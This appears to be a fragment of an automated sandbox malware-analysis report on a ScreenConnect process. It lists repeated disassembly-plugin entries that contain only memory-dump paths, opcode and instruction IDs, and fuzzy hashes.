                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 503f45f67e4fefc5cecb65c3a4f10ed8588e08ce3be10f32d0e595233316396b
                                                                                                                                                                                                                                                        • Instruction ID: aef1319d6a675949425dd662c796dc92a478660e5c5a5156252bf1d04ed9bd91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 503f45f67e4fefc5cecb65c3a4f10ed8588e08ce3be10f32d0e595233316396b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8741617021CB898FCB89DF28C8A4AA577A1FF59314B54069DE45EC73D2CB35E852CB41
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d8062cbb88d495d8217486f17735cbbd947b3b97c8e1ff2f98b8a3f4b328bdc6
                                                                                                                                                                                                                                                        • Instruction ID: 3e2407d54927c458e28488ebcaf76eba3b22583563b46660615539ccf7d609e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8062cbb88d495d8217486f17735cbbd947b3b97c8e1ff2f98b8a3f4b328bdc6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E31BB3250CB4C5FE745DE28EC865B5B7C0EB85230B84027FD44EC7252DE25F9428790
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 466ffb9c0d95a22ce07d2fbca628633ce350d260d32aee55cd96b5b87c2878ea
                                                                                                                                                                                                                                                        • Instruction ID: 628b143ae3c742ce68157b4d1372ada663b165cabf297db2666a209b6efab6b8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 466ffb9c0d95a22ce07d2fbca628633ce350d260d32aee55cd96b5b87c2878ea
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D941B331608A0D8FCF94EF68E498AADFBA1FF59315B4442AAD40DD7352DF31A805CB81
Memory Dump Source
• Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c6a1e00a4d108575f0c048775731f4c2cedf9e0cc6006236b109e7d3e3ccf1d6
                                                                                                                                                                                                                                                        • Instruction ID: 284d03e78d961abdb81b637e06f31ae4b9282b47674c0e5e53b1d366c84bbf6e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6a1e00a4d108575f0c048775731f4c2cedf9e0cc6006236b109e7d3e3ccf1d6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04418674208A49CFDF88EF18D8A47A9B7A1FF59318B50059DD46AC7386DB31E853CB40
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 68130907b2e3cbd0b9ffbe82831b43c3ec39db37e8b6e2a63003aa27ffcea637
                                                                                                                                                                                                                                                        • Instruction ID: 2589ab67b5b55a8c09a26ce9974d4d20fa682247aa73a5771687383f99f38a55
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68130907b2e3cbd0b9ffbe82831b43c3ec39db37e8b6e2a63003aa27ffcea637
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9931A57190DBC94FD747AB385824768BFB0EF53214B4901EBC189C71E3DA58A809C362
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b59d3803deb786cfebb849bf786ba38e2db860137364195a730983a51dc0410e
                                                                                                                                                                                                                                                        • Instruction ID: d733bce4b3339d9132df58c09b626bd23a966ccc3a85f02728f35ff5232d0539
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b59d3803deb786cfebb849bf786ba38e2db860137364195a730983a51dc0410e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7314B30A1CE950FD71DAB2858566B6BBE0FFA9710F00416EE44EC7283DD28B84583D2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b6efe7a307f88e069d88221dfc9e2f525596df1067d248d7b5ce2db33346cc79
                                                                                                                                                                                                                                                        • Instruction ID: fb2a63e4d173b13bcd43191d90d92bbacd54542ad66f6fb4152652eada2d7658
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6efe7a307f88e069d88221dfc9e2f525596df1067d248d7b5ce2db33346cc79
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31314BB160CE4A5FDB48EF2CA446AE9B790FF95720B400269E44EC3287DE34F81283C0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 66ce2f3cffef90c05f742e02cfa61acaf8243e42878168a869f365d0040c8067
                                                                                                                                                                                                                                                        • Instruction ID: a74fffb45e89027a58a714ceff97d1c335db0e6666845d493e0ef13df4ab85c9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66ce2f3cffef90c05f742e02cfa61acaf8243e42878168a869f365d0040c8067
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27312772F4DE484FCB569B2868212ECBBA1FF45724F4401AAE15DC3792CB29A810C7C6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0d6fcd0a8d9265dac51c0e9e116db0c70a974fb35b02af033a066b3d315bf5f3
                                                                                                                                                                                                                                                        • Instruction ID: e8dd9afd2ab8ba9a2c137c783202c955cc0dd5a6dd5e7fb5ff1b2368dccc5082
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d6fcd0a8d9265dac51c0e9e116db0c70a974fb35b02af033a066b3d315bf5f3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6231A27071CD498FCB89EF2D9424AA9B7A1FF99304B144299E05EC7292CF30A802C784
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4f28eb5cf7ab9f27cd9078fa9645cdf0f2b12f54b8b3b8b32d5afc9276199e6b
                                                                                                                                                                                                                                                        • Instruction ID: be0c2c94f982e7885fcb609ad551ebfabda5e4e752928a9772311f5b67644cbd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f28eb5cf7ab9f27cd9078fa9645cdf0f2b12f54b8b3b8b32d5afc9276199e6b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8212D7061CE855FC70D9B289456ABAB7D1FBA9750F40416EE04EC7283DE24B80583D2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e22eec884e2e09eba8623548a9bcfd03be586a52d7a1757192f8e55cb519ac83
                                                                                                                                                                                                                                                        • Instruction ID: b19310f4a431e9696ea9f6c0e00505247326080a3730487f090c40c07fb44121
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e22eec884e2e09eba8623548a9bcfd03be586a52d7a1757192f8e55cb519ac83
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE318E708087574BE70AFF6498512EDBAA1AB46B20F90057ED509D73C2DF3865468BE2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2a1551fc068b0268da5f8dd584f61c789b88466d3cb5c32ae474598bb30e70a6
                                                                                                                                                                                                                                                        • Instruction ID: 74cb020a109ad3941aef5858f92fe5597743bbf2f92f9a51d2acc99a6955a9ea
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a1551fc068b0268da5f8dd584f61c789b88466d3cb5c32ae474598bb30e70a6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D315A70D083464BEB49FF6598513FDBAE1AB45B20F9040BED509D73C2DE386A458BA2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 184b4c190ab1c0bc858048c3da3e0156eb81be3a843920d25e1713f55d2ca000
                                                                                                                                                                                                                                                        • Instruction ID: 1a5fc06584fdc2f22f83aafa3cab61016904cb462a498abf2d336b9b3d5f3634
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 184b4c190ab1c0bc858048c3da3e0156eb81be3a843920d25e1713f55d2ca000
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0021F61154CA860FE7467A6878507F8E3D1AFC5761F9804B6E84CC63D2EE1CBA8283A1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2ce6fdda41e2b214dd98d591e6f46c0e2a43a0207140799671374dd90b7a8c64
                                                                                                                                                                                                                                                        • Instruction ID: db510e0b8e499589a65cd54faace03638f9906d4b774d2847c00b57e25eb174c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ce6fdda41e2b214dd98d591e6f46c0e2a43a0207140799671374dd90b7a8c64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8210D7150DBD54FC3569F2854142B6BFE0EF96361F4505BFE0C9C76D2CA2864058791
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 368d60a974cd049d5a6fb7c8ee253dae4090884ffae426b052bea7e019c56fd3
                                                                                                                                                                                                                                                        • Instruction ID: cb45bea3d02024af1e2b0a7444188b16b3dd30b0295b26722d92be34e722009b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 368d60a974cd049d5a6fb7c8ee253dae4090884ffae426b052bea7e019c56fd3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F121933144D7898FCB46EF64D8116E9FBF0EF5622074941EBD089C75A3CB6CA806CBA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 08e3d8fbeed5ee09ef164727c517cbeed8b529686eedc3a6388fbc532b5341fc
                                                                                                                                                                                                                                                        • Instruction ID: 36bb0d6dc332b9acd0d3ad976a96297016d88f51c089e26bf66f1e04c33c075b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08e3d8fbeed5ee09ef164727c517cbeed8b529686eedc3a6388fbc532b5341fc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D217F70608A4A8FD788EF28C460BB5B3A1FF58314F4445B9E45EC7392CE34B851CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 996e2b093b1b2044053dfd132d179e6e8936171747cac657b7e179bf1896911e
                                                                                                                                                                                                                                                        • Instruction ID: 96039bbc2ebf3c5dc00979905e7635189b5774339bc1db0bebd507e57dbc448f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 996e2b093b1b2044053dfd132d179e6e8936171747cac657b7e179bf1896911e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A113A6170DA965FD7466B7CB4952F8BB90EF9A23134402F7D448CB287DE18588683D1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cc9d5530f542f74a3eb80ada720b88240a2fc4fdf15b94fd20578ba19f010c9a
                                                                                                                                                                                                                                                        • Instruction ID: d02cc70cb2553d07933e06b7ab471a223bde96c85d562bf84ac24856d7e12faf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc9d5530f542f74a3eb80ada720b88240a2fc4fdf15b94fd20578ba19f010c9a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E11387160DE924FD31AAB2C60656A9FBD0EF4927470486EFC08BC7587DD24B51387C9
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e4329bcdc9627e5548233352d0cc7852b94ca6d615b602f010ee91a58de28589
                                                                                                                                                                                                                                                        • Instruction ID: 6d45aa1c4d64efae8e9bad682de48bf9332a7b1d04dead39eb85dbe7c494d370
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4329bcdc9627e5548233352d0cc7852b94ca6d615b602f010ee91a58de28589
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F211299290EAC25FE747673C28212E8BF60EF1266470905F7C09CCF1D7D9046919C3E1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 17115861f73c7f3fc206459d431e751fd883bda4983e17164042d6441f9f33aa
                                                                                                                                                                                                                                                        • Instruction ID: 262bca9b6e537bb2c7695b385e7c58a470c93d12f2aecf0cdd1671d665bf109a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17115861f73c7f3fc206459d431e751fd883bda4983e17164042d6441f9f33aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC01BC30509B458FC365EF28D494559BBE1FF5531078544A9C00ACBAA2CB39FC85CB40
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 69c05307e198a9f59668395c79c89e1aee769aa58fab31f6aae412fce049f82b
                                                                                                                                                                                                                                                        • Instruction ID: 4b15edc67903786c9595312eeafd868824df527df1a8f76df2df3bb066ff3fd8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69c05307e198a9f59668395c79c89e1aee769aa58fab31f6aae412fce049f82b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D301B511A0DED84FD765EB3868686FCAED1AF17620F4801FED498C72DBDA0C6C448392
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9b921d3efa590ae17b5ba5f29e80f7d6f21c58c56761b156512aef010072b898
                                                                                                                                                                                                                                                        • Instruction ID: 6a9d9cf1847c0456ead0b40c0145ff4b4ddc2ffc71ec8f492f79a678bdc5a59b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b921d3efa590ae17b5ba5f29e80f7d6f21c58c56761b156512aef010072b898
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CCE09BB114E50C6EA61CAA55AC479F7779CE787134F40111FE58E82002F152B52386A5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: addff8b099f8ad43ab37746b0f0a4aa8cdd5d71ac80b0ac145e5fc7cd9953773
                                                                                                                                                                                                                                                        • Instruction ID: a7734dd3787104c2efbdee86e4c6c917adbfaad3ac7511f7f2c14f6394cd2eb9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: addff8b099f8ad43ab37746b0f0a4aa8cdd5d71ac80b0ac145e5fc7cd9953773
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F0F6308086895FEF06AB2494661EDFFB0EF46214F4500EAD408CA193CF28B9198790
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e9c86bb997ab9f34fe610a3fc772dcad075f733609038ed18dc6f3f860db841d
                                                                                                                                                                                                                                                        • Instruction ID: d5c5e2bd3445699983f7e93bc0970797f55a2c7fe26cc2e017b37899fb7493d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9c86bb997ab9f34fe610a3fc772dcad075f733609038ed18dc6f3f860db841d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B014974A1A9198FCFD4EB28C899E98B7F0EF68311F4442D9E40DD7262DE34ADC08B00
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7e9dce1c9629ded749d78eb712be655ba525728321b562e3df0b1174adc4eb07
                                                                                                                                                                                                                                                        • Instruction ID: 86cf69e3a48009784ba299008d126ef8a03a96ab20d2396c526f5d79a00af88f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e9dce1c9629ded749d78eb712be655ba525728321b562e3df0b1174adc4eb07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F0A935108A0C9FCB01EF68E4919DAFBB0FF06318B020297E089C3421CB22A959CBD1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 240fa198b65af20e46fe56046cf7ec196bdfd4e9195621e910c271c6fe0888f0
                                                                                                                                                                                                                                                        • Instruction ID: 71b827b4a28430dc9dd9d459a4b414c85fdb8323937cdb933f328c5ea50675a6
